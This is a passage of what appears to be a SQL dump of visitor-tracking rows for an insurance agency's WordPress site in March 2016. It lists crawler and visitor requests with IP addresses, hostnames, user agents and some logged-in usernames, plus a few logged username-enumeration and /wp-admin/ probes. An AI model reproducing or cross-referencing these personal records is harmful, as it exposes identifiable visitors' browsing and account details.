iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','414 x 736','','','','','','0','0',0),(9465,'0b_e1f66f1a97e85c893c738bc9de987505','1459138984','208.54.86.230','me65636d0.tmodns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','414 x 736','','','','','','0','0',0),(9468,'0b_e1f66f1a97e85c893c738bc9de987505','1459138998','208.54.86.230','me65636d0.tmodns.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','414 x 736','','','','','','0','0',0),(9470,'0b_5ca761474bcd9128e7daf523af507e73','1459140360','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/SSO/235_11.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9471,'0b_5ca761474bcd9128e7daf523af507e73','1459140489','157.55.39.101','msnbot-157-55-39-101.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9474,'0b_b47bbb70d7726a24c39df9a8f0e814ae','1459140521','54.224.172.153','ec2-54-224-172-153.compute-1.amazonaws.com','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2','','',0,'Linux','Qt 4','us','','','','','','','0','0',0),(9476,'0b_b47bbb70d7726a24c39df9a8f0e814ae','1459140523','54.224.172.153','ec2-54-224-172-153.compute-1.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2','http://www.empireins.com/','',0,'Linux','Qt 4','us','','','','','','','0','0',0),(9477,'0b_08bf42d94c3f73a10f20e9a6bb5d91f8','1459140524','54.224.172.153','ec2-54-224-172-153.compute-1.amazonaws.com','/robots.txt','Python-urllib/1.17','','',0,'','','','','','Python-urllib','','','','0','0',0),(9479,'0b_b47bbb70d7726a24c39df9a8f0e814ae','1459140525','54.224.172.153','ec2-54-224-172-153.compute-1.amazonaws.com','/contact/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2','','',0,'Linux','Qt 4','us','','','','','','','0','0',0),(9482,'0b_b47bbb70d7726a24c39df9a8f0e814ae','1459140527','54.224.172.153','ec2-54-224-172-153.compute-1.amazonaws.com','/about-us/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2','','',0,'Linux','Qt 4','us','','','','','','','0','0',0),(9483,'0b_faf48034462ed7ab489cd123425f44b1','1459141217','208.115.111.66','208-115-111-66-reverse.wowrack.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(9485,'0b_6ea091f3a5254fec0b663fd95d5b464f','1459142564','66.249.73.189','crawl-66-249-73-189.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(9488,'0b_6ea091f3a5254fec0b663fd95d5b464f','1459142566','66.249.73.189','crawl-66-249-73-189.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(9491,'0b_67206dae410c43a9dcac5b11a2a47905','1459143432','100.43.91.16','spider-100-43-91-16.yandex.com','/quotes.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(9494,'0b_de2a628f7ca7c4035546124655c8a58c','1459145631','5.153.233.130','5.153.233.130','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(9495,'0b_de2a628f7ca7c4035546124655c8a58c','1459145641','5.153.233.130','5.153.233.130','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(9498,'0b_de2a628f7ca7c4035546124655c8a58c','1459145652','5.153.233.130','5.153.233.130','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(9501,'0b_9b85826f8f5c26adf836c5021f4131d0','1459146001','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9504,'0b_9b85826f8f5c26adf836c5021f4131d0','1459146124','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/about-us','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(9506,'0b_9b85826f8f5c26adf836c5021f4131d0','1459146441','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(9509,'0b_2fa9b05d9013028d1fb6a247f61831f9','1459146455','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9512,'0b_6889cf474d8de6fb5ca90b4b5f92b8b4','1459147036','100.43.91.15','spider-100-43-91-15.yandex.com','/quotes.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(9513,'0b_a2946abe8e68aa074df43391dceb8602','1459149114','141.8.143.235','spider-141-8-143-235.yandex.com','/quotes.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(9516,'0b_577d3ae72afd0dab508c1583386111b7','1459150839','207.46.13.169','msnbot-207-46-13-169.search.msn.com','/carriers','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(9518,'0b_577d3ae72afd0dab508c1583386111b7','1459150857','207.46.13.169','msnbot-207-46-13-169.search.msn.com','/carriers/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(9521,'0b_1771d8efee4e9729cf991dcba4b4419e','1459152350','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(9522,'0b_747e680fc2e3da08350d3fe302e7249d','1459154312','100.43.85.8','spider-100-43-85-8.yandex.com','/quotes.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(9524,'0b_3d76cea20cee62bae1a832c827b0338a','1459154476','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/crafting-an-essay-9/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9527,'0b_c3ce4e803a08478f1577a1e617bb61e2','1459154896','66.249.73.187','crawl-66-249-73-187.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(9528,'0b_e9b7cf731511b424f2421c53b75e3769','1459155164','69.30.234.186','69.30.234.186','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(9530,'0b_e9b7cf731511b424f2421c53b75e3769','1459155175','69.30.234.186','69.30.234.186','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(9531,'0b_e9b7cf731511b424f2421c53b75e3769','1459155186','69.30.234.186','69.30.234.186','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(9534,'0b_e9b7cf731511b424f2421c53b75e3769','1459155198','69.30.234.186','69.30.234.186','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(9537,'0b_e9b7cf731511b424f2421c53b75e3769','1459155219','69.30.234.186','69.30.234.186','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(9540,'0b_e9b7cf731511b424f2421c53b75e3769','1459155244','69.30.234.186','69.30.234.186','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(9543,'0b_abdb5f83793602dd4e6ce9e690cb50e8','1459155489','192.187.114.10','code-mode.cakestandchar.net','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(9546,'0b_abdb5f83793602dd4e6ce9e690cb50e8','1459155490','192.187.114.10','code-mode.cakestandchar.net','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(9548,'0b_abdb5f83793602dd4e6ce9e690cb50e8','1459155491','192.187.114.10','code-mode.cakestandchar.net','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(9551,'0b_318f14711baddd5a09171392ac5effdf','1459155923','81.30.220.145','81.30.220.145.static.ufanet.ru','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','ru','','','','','','','0','0',0),(9552,'0b_3079814245018d3d0a355c42c637c839','1459156361','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9555,'0b_10dfea103d09206213c7af584a121d7b','1459159510','62.210.148.246','mj9.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(9558,'0b_10dfea103d09206213c7af584a121d7b','1459159512','62.210.148.246','mj9.naefmarco.ch','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(9560,'0b_10dfea103d09206213c7af584a121d7b','1459159514','62.210.148.246','mj9.naefmarco.ch','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(9561,'0b_c61afd1fa07294f732449f56c94819d0','1459160922','199.21.99.201','spider-199-21-99-201.yandex.com','/quotes.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(9564,'0b_2de9c19fe8e86e5386a6699b2e6c56d8','1459162342','66.55.141.140','66.55.141.140.choopa.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'Win7','Firefox 16','ua','','','','','','','0','0',0),(9567,'0b_a74672d969d2b3960bf9ca2de4c66a51','1459164037','66.249.73.187','crawl-66-249-73-187.googlebot.com','/agent-tools/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(9569,'0b_2ff56ef12765bd8de0e7912311a33751','1459164621','180.76.15.5','baiduspider-180-76-15-5.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(9570,'0b_2cc52c1c7531905468af96ad77c9693f','1459164693','180.76.15.20','baiduspider-180-76-15-20.crawl.baidu.com','/igo/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(9572,'0b_43315eb067a3098faafb328a2fa66399','1459166257','46.4.32.75','static.75.32.4.46.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(9575,'0b_43315eb067a3098faafb328a2fa66399','1459166259','46.4.32.75','static.75.32.4.46.clients.your-server.de','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(9576,'0b_2abb7debaa5bb3352f73dbc0eea97b7b','1459166383','69.30.234.186','69.30.234.186','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(9579,'0b_972e95c63216d75f3fca0e8d724cddcb','1459166407','69.30.234.186','69.30.234.186','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(9582,'0b_972e95c63216d75f3fca0e8d724cddcb','1459166430','69.30.234.186','69.30.234.186','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(9584,'0b_b71cbbe6435aa93676722b5e6adde36e','1459166703','180.76.15.18','baiduspider-180-76-15-18.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(9585,'0b_1575a52e2f6ce59ed4cc6cb9b0b94912','1459170595','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(9588,'0b_d27316e528cf9ee15124b3c1933a2514','1459171223','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(9591,'0b_d27316e528cf9ee15124b3c1933a2514','1459171225','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(9594,'0b_b3f573d36428ee0ac0ce0acf8ad7d20b','1459171819','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9596,'0b_2c7718d92a6b93cd62319b85f59ffe02','1459172009','207.46.13.169','msnbot-207-46-13-169.search.msn.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(9597,'0b_e478c3e4f5499ad4572a05b57867f61f','1459173054','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(9600,'0b_e478c3e4f5499ad4572a05b57867f61f','1459173055','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(9603,'0b_edfc18ba2baea77f5103366f286db505','1459174646','168.215.98.218','168-215-98-218.static.twtelecom.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Chrome 49','us','','Google','','','','','0','0',0),(9606,'0b_edfc18ba2baea77f5103366f286db505','1459174649','168.215.98.218','168-215-98-218.static.twtelecom.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','','','','','','','0','0',0),(9609,'0b_b24d66d78d4c04464c271a816c9f0b23','1459175132','141.8.143.232','spider-141-8-143-232.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(9612,'0b_9b55fb38392a498fe61b4bcb2a369415','1459175776','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(9614,'0b_9b55fb38392a498fe61b4bcb2a369415','1459175778','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(9617,'0b_9b55fb38392a498fe61b4bcb2a369415','1459176191','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(9618,'0b_d27316e528cf9ee15124b3c1933a2514','1459176192','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(9621,'0b_9b55fb38392a498fe61b4bcb2a369415','1459176193','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(9623,'0b_8473d12afdb45f07ab7b57b4381d418c','1459177031','208.115.111.66','208-115-111-66-reverse.wowrack.com','/meet-the-eib-team/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(9626,'0b_4ba9df46d7bffc88fc467e5b2615bdeb','1459177115','47.16.162.38','ool-2f10a226.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(9627,'0b_4ba9df46d7bffc88fc467e5b2615bdeb','1459177116','47.16.162.38','ool-2f10a226.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(9630,'0b_4ba9df46d7bffc88fc467e5b2615bdeb','1459177119','47.16.162.38','ool-2f10a226.dyn.optonline.net','/contact/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(9632,'0b_8e839d5c0bfba5dece93c55e6ef9d703','1459177481','104.246.54.244','ool-68f636f4.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(9633,'0b_8e839d5c0bfba5dece93c55e6ef9d703','1459177483','104.246.54.244','ool-68f636f4.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(9635,'0b_8e839d5c0bfba5dece93c55e6ef9d703','1459177487','104.246.54.244','ool-68f636f4.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(9638,'0b_60c220d4c4290874413604b68209106d','1459177494','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9641,'0b_60c220d4c4290874413604b68209106d','1459177497','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9644,'0b_60c220d4c4290874413604b68209106d','1459177498','184.154.139.23','placeholder.sitelock.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9645,'0b_60c220d4c4290874413604b68209106d','1459177501','184.154.139.23','placeholder.sitelock.com','/term-quotes/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9648,'0b_60c220d4c4290874413604b68209106d','1459177503','184.154.139.23','placeholder.sitelock.com','/contact/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9650,'0b_60c220d4c4290874413604b68209106d','1459177505','184.154.139.23','placeholder.sitelock.com','/comments/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9651,'0b_60c220d4c4290874413604b68209106d','1459177507','184.154.139.23','placeholder.sitelock.com','/forms/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9654,'0b_60c220d4c4290874413604b68209106d','1459177510','184.154.139.23','placeholder.sitelock.com','/register/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9656,'0b_60c220d4c4290874413604b68209106d','1459177512','184.154.139.23','placeholder.sitelock.com','/contact/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9659,'0b_661d013f3412a0f6e92a7eefc7cb1687','1459177514','184.154.139.23','placeholder.sitelock.com','/?p=169','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','0','0',0),(9660,'0b_60c220d4c4290874413604b68209106d','1459177514','184.154.139.23','placeholder.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(9662,'0b_4ba9df46d7bffc88fc467e5b2615bdeb','1459178792','47.16.162.38','ool-2f10a226.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','51',0),(9663,'0b_4ba9df46d7bffc88fc467e5b2615bdeb','1459178793','47.16.162.38','ool-2f10a226.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(9665,'0b_4ba9df46d7bffc88fc467e5b2615bdeb','1459178797','47.16.162.38','ool-2f10a226.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','','','0','51',0),(9668,'0b_4ba9df46d7bffc88fc467e5b2615bdeb','1459178815','47.16.162.38','ool-2f10a226.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win8 x64','IE 11','us','1366 x 768','','','','zlberger','','0','51',0),(9671,'0b_296a5bd248a9c5824cb9737e9f223548','1459180263','52.6.229.204','ec2-52-6-229-204.compute-1.amazonaws.com','/','Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.7.62 Version/11.0','','',0,'Win2003','Opera 9','ru','','','','','','','0','0',0),(9672,'0b_05f260bb4ce9f26d58e95a20a5840453','1459180847','67.85.210.17','ool-4355d211.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win8','Chrome 49','us','1600 x 900','','','','','','0','0',0),(9675,'0b_05f260bb4ce9f26d58e95a20a5840453','1459180848','67.85.210.17','ool-4355d211.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1600 x 900','','','','','','0','0',0),(9678,'0b_05f260bb4ce9f26d58e95a20a5840453','1459180862','67.85.210.17','ool-4355d211.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1600 x 900','','','','','','0','0',0),(9680,'0b_05f260bb4ce9f26d58e95a20a5840453','1459180916','67.85.210.17','ool-4355d211.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 